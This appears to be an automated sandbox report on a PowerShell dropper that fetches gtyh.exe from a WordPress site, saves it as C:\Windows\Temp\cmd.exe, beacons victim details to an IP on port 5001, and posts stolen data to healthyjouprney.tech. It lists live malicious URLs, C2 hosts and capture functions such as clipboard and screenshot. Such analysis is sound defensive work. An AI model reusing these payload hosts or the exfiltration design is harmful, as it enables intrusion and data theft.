                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49702 -> 35.208.212.94:443
                          Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 35.208.212.94:443 -> 192.168.2.7:49702
                          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/newsletter/images/gtyh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sandramosquedamx.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=01FJ31T2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9G2XNXJYM5N6UYFDCZ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 6706Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J7HJI078QZXHSCSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20380Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ST6O9P6BQCQO1GKKVAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2226Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HM9RDGEJ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 385775Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: healthyjouprney.tech
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /script_end?random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /wp-content/plugins/newsletter/images/gtyh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sandramosquedamx.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /script_end?random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
                          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                          Source: global trafficDNS traffic detected: DNS query: sandramosquedamx.com
                          Source: global trafficDNS traffic detected: DNS query: healthyjouprney.tech
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: healthyjouprney.tech
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
                          Source: notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=29634
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=29634$M
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1String found in binary or memory: http://api.ipify.org
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: powershell.exe, 00000000.00000002.1425682486.0000000007BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://x1.c.lencr.org/0
                          Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.drString found in binary or memory: http://x1.i.lencr.org/0
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2025610040.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043885038.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2041606518.0000000000C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/A
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2089874877.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074794526.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/api
                          Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/api0
                          Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/apiF
                          Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/apig
                          Source: cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/apiied
                          Source: cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/apimeP
                          Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech/apior
                          Source: cmd.exe, 0000000A.00000003.2074794526.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://healthyjouprney.tech:443/api
                          Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                          Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 00000000.00000002.1405953720.0000000004918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sandramosquedamx.com
                          Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1String found in binary or memory: https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://support.mozilla.org
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                          Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp, B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                          Source: B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp, B36A69092427CC90.dat.10.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                          Source: unknownHTTPS traffic detected: 35.208.212.94:443 -> 192.168.2.7:49702 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49974 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49975 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49981 version: TLS 1.2
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043B2B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,10_2_0043B2B0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043B2B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,10_2_0043B2B0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043B460 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,10_2_0043B460

                          System Summary

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02653BAE NtWriteVirtualMemory,NtWriteVirtualMemory,10_2_02653BAE
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02653B9C NtWriteVirtualMemory,NtWriteVirtualMemory,10_2_02653B9C
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_045CE4620_2_045CE462
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041907010_2_00419070
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044836010_2_00448360
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042C4A010_2_0042C4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043374510_2_00433745
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042977A10_2_0042977A
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044773010_2_00447730
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004407C010_2_004407C0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004197EB10_2_004197EB
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040BBA010_2_0040BBA0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00412C1310_2_00412C13
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00414D2B10_2_00414D2B
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00425EB010_2_00425EB0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_00419FF310_2_00419FF3
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040104010_2_00401040
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043B04010_2_0043B040
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004280F410_2_004280F4
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044108010_2_00441080
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041209E10_2_0041209E
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043F0A510_2_0043F0A5
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043513010_2_00435130
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040D1BE10_2_0040D1BE
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041325010_2_00413250
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041625010_2_00416250
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041B26C10_2_0041B26C
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040A2D010_2_0040A2D0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041028010_2_00410280
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0043831C10_2_0043831C
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004343C210_2_004343C2
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042E3D010_2_0042E3D0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041346210_2_00413462
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042547010_2_00425470
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0042240010_2_00422400
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040E4F010_2_0040E4F0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004094F010_2_004094F0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0041E4A010_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0040355010_2_00403550
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044155010_2_00441550
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_0044652610_2_00446526
